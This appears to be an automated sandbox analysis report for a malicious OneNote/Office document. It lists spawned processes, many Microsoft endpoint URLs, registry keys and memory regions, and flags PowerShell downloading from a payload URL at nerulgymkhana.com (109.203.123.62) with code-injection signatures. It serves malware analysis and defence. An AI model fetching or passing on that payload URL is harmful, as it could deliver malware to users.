Spawns processes	System Summary	Process Injection

C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE

/tsr

Details

Is windows:	true
Is dropped:	false
PID:	5592
Target ID:	17
Parent PID:	2956
Name:	ONENOTEM.EXE
Class:	office
Path:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Commandline:	/tsr
Size:	157872
MD5:	DBCFA6F25577339B877D2305CAD3DEC3
Time:	19:53:44
Date:	07/02/2023
Reason:	newprocess
Reputation:	timeout
Is admin:	true
Is elevated:	true
Modulebase:	0xed0000
Modulesize:	167936
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Document exploit detected (process start blacklist hit)	Software Vulnerabilities	Exploitation for Client Execution
Spawns processes	System Summary	Process Injection
Windows shortcut file (LNK) contains relative path	System Summary

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	6124
Target ID:	2
Parent PID:	6096
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	625664
MD5:	EA777DEEA782E8B4D7C7C33BBF8A4496
Time:	19:53:26
Date:	07/02/2023
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff745070000
Modulesize:	651264
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	5296
Target ID:	5
Parent PID:	1404
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	625664
MD5:	EA777DEEA782E8B4D7C7C33BBF8A4496
Time:	19:53:30
Date:	07/02/2023
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff745070000
Modulesize:	651264
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://api.diagnosticssdf.office.com

unknown

https://login.microsoftonline.com/

unknown

https://shell.suite.office.com:1443

unknown

https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize

unknown

https://autodiscover-s.outlook.com/

unknown

https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr

unknown

https://cdn.entity.

unknown

https://api.addins.omex.office.net/appinfo/query

unknown

https://clients.config.office.net/user/v1.0/tenantassociationkey

unknown

https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/

unknown

https://powerlift.acompli.net

unknown

https://rpsticket.partnerservices.getmicrosoftkey.com

unknown

https://lookup.onenote.com/lookup/geolocation/v1

unknown

https://cortana.ai

unknown

https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech

unknown

https://cloudfiles.onenote.com/upload.aspx

unknown

https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile

unknown

https://entitlement.diagnosticssdf.office.com

unknown

https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy

unknown

https://api.aadrm.com/

unknown

https://ofcrecsvcapi-int.azurewebsites.net/

unknown

https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies

unknown

https://api.microsoftstream.com/api/

unknown

https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive

unknown

https://cr.office.com

unknown

https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h

unknown

https://portal.office.com/account/?ref=ClientMeControl

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://graph.ppe.windows.net

unknown

https://res.getmicrosoftkey.com/api/redemptionevents

unknown

https://powerlift-frontdesk.acompli.net

unknown

https://tasks.office.com

unknown

https://officeci.azurewebsites.net/api/

unknown

https://sr.outlook.office.net/ws/speech/recognize/assistant/work

unknown

https://api.scheduler.

unknown

https://my.microsoftpersonalcontent.com

unknown

https://nerulgymkhana.com/CCoN/01.gif

109.203.123.62

https://store.office.cn/addinstemplate

unknown

https://api.aadrm.com

unknown

https://outlook.office.com/autosuggest/api/v1/init?cvid=

unknown

https://globaldisco.crm.dynamics.com

unknown

https://messaging.engagement.office.com/

unknown

https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech

unknown

https://dev0-api.acompli.net/autodetect

unknown

https://www.odwebp.svc.ms

unknown

https://api.diagnosticssdf.office.com/v2/feedback

unknown

https://api.powerbi.com/v1.0/myorg/groups

unknown

https://web.microsoftstream.com/video/

unknown

https://api.addins.store.officeppe.com/addinstemplate

unknown

https://graph.windows.net

unknown

https://dataservice.o365filtering.com/

unknown

https://officesetup.getmicrosoftkey.com

unknown

https://analysis.windows.net/powerbi/api

unknown

https://prod-global-autodetect.acompli.net/autodetect

unknown

https://outlook.office365.com/autodiscover/autodiscover.json

unknown

https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios

unknown

https://consent.config.office.com/consentcheckin/v1.0/consents

unknown

https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech

unknown

https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices

unknown

https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json

unknown

https://d.docs.live.net

unknown

https://ncus.contentsync.

unknown

https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false

unknown

https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/

unknown

http://weather.service.msn.com/data.aspx

unknown

https://apis.live.net/v5.0/

unknown

https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks

unknown

https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios

unknown

https://messaging.lifecycle.office.com/

unknown

https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml

unknown

https://pushchannel.1drv.ms

unknown

https://management.azure.com

unknown

https://outlook.office365.com

unknown

https://wus2.contentsync.

unknown

https://incidents.diagnostics.office.com

unknown

https://clients.config.office.net/user/v1.0/ios

unknown

https://make.powerautomate.com

unknown

https://insertmedia.bing.office.net/odc/insertmedia

unknown

https://o365auditrealtimeingestion.manage.office.com

unknown

https://outlook.office365.com/api/v1.0/me/Activities

unknown

https://api.office.net

unknown

https://incidents.diagnosticssdf.office.com

unknown

https://asgsmsproxyapi.azurewebsites.net/

unknown

https://clients.config.office.net/user/v1.0/android/policies

unknown

https://entitlement.diagnostics.office.com

unknown

https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json

unknown

https://substrate.office.com/search/api/v2/init

unknown

https://outlook.office.com/

unknown

https://storage.live.com/clientlogs/uploadlocation

unknown

https://outlook.office365.com/

unknown

https://webshell.suite.office.com

unknown

https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive

unknown

https://substrate.office.com/search/api/v1/SearchHistory

unknown

https://management.azure.com/

unknown

https://messaging.lifecycle.office.com/getcustommessage16

unknown

https://clients.config.office.net/c2r/v1.0/InteractiveInstallation

unknown

https://login.windows.net/common/oauth2/authorize

unknown

https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile

unknown

https://graph.windows.net/

unknown

https://api.powerbi.com/beta/myorg/imports

unknown

There are 90 hidden URLs, click here to show them.

Domains

Name

Malicious

nerulgymkhana.com

109.203.123.62

Details

Name:	nerulgymkhana.com
IP:	109.203.123.62
TargetID:	6
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

109.203.123.62

nerulgymkhana.com

United Kingdom

Details

IP:	109.203.123.62
TargetID:	6
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	United Kingdom
Countrycode:	GBR
ASN number:	31727
ASN name:	NODE4-ASGB
Private:	false
Domain:	nerulgymkhana.com

Signature Hits	Behavior Group	Mitre Attack
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\Resiliency\StartupItems

r~2

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\Resiliency\StartupItems

s~2

HKEY_CURRENT_USER\Software\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton

FriendlyName

HKEY_CURRENT_USER\Software\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton

Description

HKEY_CURRENT_USER\Software\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton

LoadBehavior

HKEY_CURRENT_USER\Software\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton

CommandLineSafe

HKEY_CURRENT_USER\Software\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton

FriendlyName

HKEY_CURRENT_USER\Software\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton

Description

HKEY_CURRENT_USER\Software\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton

LoadBehavior

HKEY_CURRENT_USER\Software\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton

CommandLineSafe

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\General

LastMyDocumentsPathUsed

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\General

ProgressWindowPosLeft

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\General

ProgressWindowPosTop

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\General

ConsecutiveBootCrashes

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\General

ConsecutiveEarlyCrashes

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\Options\Save

BackupFilenamePostfixStartSP1

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\Options\Save

BackupFilenamePostfixEndSP1

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\Options\Save

BackupFilenamePostfixEndRerepairSP1

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote

FirstBootStatus

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\Options

WatsonLoggingUserId

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache

RemoteClearDate

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3

Last

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0

FilePath

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0

StartDate

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0

EndDate

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0

Properties

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0

Url

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache

LastClean

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity

DisableWinHttpCertAuth

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity

DisableIsOwnerRegex

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity

DisableSessionAwareHttpClose

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity

DisableADALForExtendedApps

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity

DisableADALSetSilentAuth

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity

msoridDisableGuestCredProvider

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity

msoridDisableOstringReplace

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\OpenNotebooks

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000061091A0090400000000000F01FEC\Usage

OneNoteNonBootFilesIntl_1033

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\OpenNotebooks

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\General

LastCacheFclRepairSuccessTime

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\General

LastAppliedNotebookColor

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\OpenNotebooks

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\Resiliency

RepairQuickNotesOnBoot

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\General

LastNotebookHierarchySQMUpdate

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FavoritePens

Data

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\Place MRU\Change

ChangeId

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\RecentNotebooks\Change

ChangeId

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage

OneNoteFiles

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage

ProductFiles

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-US

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-US

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}\1.0

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}\1.0\0\win32

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.1

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.1\0\win32

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1D12BD3F-89B6-4077-AA2C-C9DC2BCA42F9}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1D12BD3F-89B6-4077-AA2C-C9DC2BCA42F9}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{627EA7B4-95B5-4980-84C1-9D20DA4460B1}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{627EA7B4-95B5-4980-84C1-9D20DA4460B1}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{452AC71A-B655-4967-A208-A4CC39DD7949}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{452AC71A-B655-4967-A208-A4CC39DD7949}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6D4B9C3E-CC05-493F-85E2-43D1006DF96A}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6D4B9C3E-CC05-493F-85E2-43D1006DF96A}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E8304B8-CBD1-44F8-B0E8-89C625B2002E}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8E8304B8-CBD1-44F8-B0E8-89C625B2002E}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\TypeLib

Version

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\TypeLib

Version

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote

FirstBootStatus

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote\General

LastAppliedNotebookColor

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote

FirstBootStatus

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage

ProductFiles

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming

RoamingConfigurableSettings

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming

RoamingLastSyncTime

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming

RoamingLastWriteTime

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OneNote

FirstBootStatus

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog

CacheReady

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog

LastRequest

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog

CacheReady

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog

LastUpdate

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog

NextUpdate

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000061091A0090400000000000F01FEC\Usage

OneNoteFilesIntl_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage

OneNoteFiles

There are 88 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

27D500B1000

trusted library allocation

page read and write

2789EA76000

heap

page read and write

DBF92F9000

stack

page read and write

27D4FFD2000

heap

page read and write

1C61F207000

heap

page read and write

27D683F9000

heap

page read and write

27D4E364000

heap

page read and write

7FFBAD580000

trusted library allocation

page read and write

22E023E0000

remote allocation

page read and write

7FFBAD414000

trusted library allocation

page read and write

D52E7FE000

stack

page read and write

7FFBAD4F7000

trusted library allocation

page read and write

22E023E0000

remote allocation

page read and write

677507B000

stack

page read and write

27D4FFF5000

heap

page read and write

D52E36F000

stack

page read and write

2789EA42000

heap

page read and write

182F9260000

heap

page read and write

27D4E270000

heap

page read and write

1B408802000

heap

page read and write

27D5014A000

trusted library allocation

page read and write

22E00A5A000

heap

page read and write

22E00A4C000

heap

page read and write

22E00A00000

heap

page read and write

27D4E5E5000

heap

page read and write

27D4FFBF000

heap

page read and write

21CCD980000

heap

page read and write

2789EA48000

heap

page read and write

7FFBAD442000

trusted library allocation

page read and write

B703F8F000

stack

page read and write

2789EA58000

heap

page read and write

1B2E7C4D000

heap

page read and write

1B2E7C3A000

heap

page read and write

DBF927F000

stack

page read and write

8F7B6FE000

stack

page read and write

1D1AF089000

heap

page read and write

27D5054A000

trusted library allocation

page read and write

1B408630000

heap

page read and write

2789EA3B000

heap

page read and write

A006AFF000

stack

page read and write

1B40885C000

heap

page read and write

7FFBAD540000

trusted library allocation

page read and write

27D4FFCD000

heap

page read and write

1D1AF086000

heap

page read and write

394687F000

stack

page read and write

22E00B02000

heap

page read and write

D52EB3E000

stack

page read and write

27D683F0000

heap

page read and write

1D1AFA23000

heap

page read and write

7FFBAD346000

trusted library allocation

page execute and read and write

21CCD68F000

heap

page read and write

39466FF000

stack

page read and write

22E00980000

trusted library allocation

page read and write

1D1AF000000

heap

page read and write

21CCE270000

trusted library allocation

page read and write

1D1AFA13000

heap

page read and write

1B2E7C43000

heap

page read and write

27D4FFB2000

heap

page read and write

27D4E2B8000

heap

page read and write

4E1277C000

stack

page read and write

24C1C370000

heap

page read and write

1B408829000

heap

page read and write

39460FF000

stack

page read and write

1D1AF05C000

heap

page read and write

27D68730000

trusted library allocation

page read and write

2789EA78000

heap

page read and write

1F8E7F000

stack

page read and write

246E6980000

heap

page read and write

1D1AF954000

heap

page read and write

27D50638000

trusted library allocation

page read and write

2789EA7D000

heap

page read and write

1D1AF900000

heap

page read and write

182F9360000

trusted library allocation

page read and write

22E009C0000

trusted library allocation

page read and write

D52EAB8000

stack

page read and write

27D68720000

trusted library allocation

page read and write

2789EA5F000

heap

page read and write

7FFBAD590000

trusted library allocation

page read and write

27D4FFF9000

heap

page read and write

27D4FFC1000

heap

page read and write

27D4FF2F000

heap

page read and write

2789F202000

trusted library allocation

page read and write

7FFBAD260000

trusted library allocation

page read and write

21CCD698000

heap

page read and write

D52EA38000

stack

page read and write

27D4FFE6000

heap

page read and write

1D1AFA30000

heap

page read and write

21CCD687000

heap

page read and write

246E6A23000

heap

page read and write

8F7B67D000

stack

page read and write

246E6910000

heap

page read and write

9D1F12B000

stack

page read and write

24C1C3A0000

trusted library allocation

page read and write

27D68402000

heap

page read and write

62C997E000

stack

page read and write

21CCD520000

heap

page read and write

21CCD630000

trusted library allocation

page read and write

677527B000

stack

page read and write

1D1AF05A000

heap

page read and write

7FFBAD4C0000

trusted library allocation

page read and write

21CCD698000

heap

page read and write

1D1AEFD0000

trusted library allocation

page read and write

3945D4C000

stack

page read and write

8F7BBFE000

stack

page read and write

8F7B97F000

stack

page read and write

22E00950000

trusted library allocation

page read and write

1B2EAE23000

heap

page read and write

27D5066E000

trusted library allocation

page read and write

21CCD620000

trusted library allocation

page read and write

1B2E7C66000

heap

page read and write

7DF4BB370000

trusted library allocation

page execute and read and write

1D1AF05D000

heap

page read and write

62C9E7D000

stack

page read and write

2789EA3D000

heap

page read and write

62C9C7C000

stack

page read and write

1F8D7B000

stack

page read and write

2789EA73000

heap

page read and write

27D4E32D000

heap

page read and write

24C1C310000

heap

page read and write

25E842C0000

heap

page read and write

4E11FEB000

stack

page read and write

27D4FF53000

heap

page read and write

21CCE480000

heap

page readonly

27D50181000

trusted library allocation

page read and write

246E69E0000

remote allocation

page read and write

394637B000

stack

page read and write

2789EA71000

heap

page read and write

7FFBAD520000

trusted library allocation

page read and write

246E6A40000

heap

page read and write

7FFBAD450000

trusted library allocation

page execute and read and write

27D4E440000

heap

page read and write

7FFBAD263000

trusted library allocation

page execute and read and write

1D1AEF80000

heap

page read and write

1B2E7C43000

heap

page read and write

1B2EADC0000

heap

page read and write

21CCE4F0000

trusted library allocation

page read and write

7FFBAD402000

trusted library allocation

page read and write

1D1AF02F000

heap

page read and write

246E6B02000

heap

page read and write

246E6A00000

heap

page read and write

27D5055D000

trusted library allocation

page read and write

22E00830000

heap

page read and write

27D68710000

trusted library allocation

page read and write

1B2E7C20000

heap

page read and write

22E00A13000

heap

page read and write

2789EA32000

heap

page read and write

21CCD5B0000

heap

page read and write

1D1AFA27000

heap

page read and write

1D1AF092000

heap

page read and write

2789EA74000

heap

page read and write

677517E000

stack

page read and write

1F937F000

stack

page read and write

2789EA59000

heap

page read and write

B703E8B000

stack

page read and write

24C1CC02000

heap

page read and write

27D50101000

trusted library allocation

page read and write

1B2EAE20000

heap

page read and write

1D1AFA00000

heap

page read and write

27D4FF20000

heap

page read and write

27D4FFF1000

heap

page read and write

2789E800000

heap

page read and write

22E02402000

trusted library allocation

page read and write

27D4E2A9000

heap

page read and write

62C9B7C000

stack

page read and write

1D1AF013000

heap

page read and write

24C1C4E2000

heap

page read and write

1B408813000

heap

page read and write

1D1AFA30000

heap

page read and write

21CCD970000

trusted library allocation

page read and write

21CCD990000

trusted library allocation

page read and write

A006BFE000

stack

page read and write

1B2E7D80000

heap

page read and write

7FFBAD5A0000

trusted library allocation

page read and write

1B2E7AA0000

heap

page read and write

2789E860000

heap

page read and write

25E84452000

heap

page read and write

2789EA45000

heap

page read and write

1D1AF902000

heap

page read and write

246E6A13000

heap

page read and write

27D50554000

trusted library allocation

page read and write

27D4FFED000

heap

page read and write

7FFBAD4E0000

trusted library allocation

page read and write

1D1AF06D000

heap

page read and write

1F947F000

stack

page read and write

7FFBAD500000

trusted library allocation

page read and write

1F967F000

stack

page read and write

2789EA40000

heap

page read and write

7FFBAD380000

trusted library allocation

page execute and read and write

9D1F6FE000

stack

page read and write

1B408913000

heap

page read and write

1F957E000

stack

page read and write

22E00B00000

heap

page read and write

21CCE490000

trusted library allocation

page read and write

7FFBAD270000

trusted library allocation

page read and write

25E84502000

heap

page read and write

27D5050C000

trusted library allocation

page read and write

27D500C6000

trusted library allocation

page read and write

1D1AF9B0000

heap

page read and write

1B2E7C37000

heap

page read and write

21CCD6A2000

heap

page read and write

1B4087A0000

trusted library allocation

page read and write

2789EA7A000

heap

page read and write

7FFBAD411000

trusted library allocation

page read and write

1C61EFB0000

heap

page read and write

27D4E2B0000

heap

page read and write

27D5000D000

heap

page read and write

2789EA62000

heap

page read and write

27D4FFFB000

heap

page read and write

7FFBAD480000

trusted library allocation

page read and write

27D4E5D4000

trusted library allocation

page read and write

D52E3EE000

stack

page read and write

7FFBAD41D000

trusted library allocation

page read and write

27D50676000

trusted library allocation

page read and write

2789EA4E000

heap

page read and write

7FFBAD550000

trusted library allocation

page read and write

2789EA5E000

heap

page read and write

24C1C429000

heap

page read and write

DBF91F9000

stack

page read and write

1B2E7C44000

heap

page read and write

27D50132000

trusted library allocation

page read and write

62C92FB000

stack

page read and write

21CCD68F000

heap

page read and write

182F9471000

heap

page read and write

1B2E7D85000

heap

page read and write

4E12BFD000

stack

page read and write

182F943C000

heap

page read and write

1F917D000

stack

page read and write

27D686F0000

trusted library allocation

page read and write

1F8A7C000

stack

page read and write

D52E87E000

stack

page read and write

182F9400000

heap

page read and write

27D4E520000

heap

page read and write

27D504F2000

trusted library allocation

page read and write

1F907E000

stack

page read and write

7FFBAD273000

trusted library allocation

page read and write

25E84441000

heap

page read and write

27D50015000

heap

page read and write

1D1AF113000

heap

page read and write

21CCD6A9000

heap

page read and write

27D504D3000

trusted library allocation

page read and write

27D50643000

trusted library allocation

page read and write

1B2E7C53000

heap

page read and write

7FFBAD530000

trusted library allocation

page read and write

7FFBAD560000

trusted library allocation

page read and write

24C1C413000

heap

page read and write

DBF917A000

stack

page read and write

27D4FFDE000

heap

page read and write

21CCD989000

heap

page read and write

2789EA72000

heap

page read and write

24C1C502000

heap

page read and write

1D1AF03D000

heap

page read and write

25E843C0000

trusted library allocation

page read and write

27D600B1000

trusted library allocation

page read and write

4E126FF000

stack

page read and write

7FFBAD495000

trusted library allocation

page read and write

27D4FF10000

heap

page execute and read and write

182F9513000

heap

page read and write

1B2EA8C0000

heap

page read and write

246E6A34000

heap

page read and write

9D1F1AE000

stack

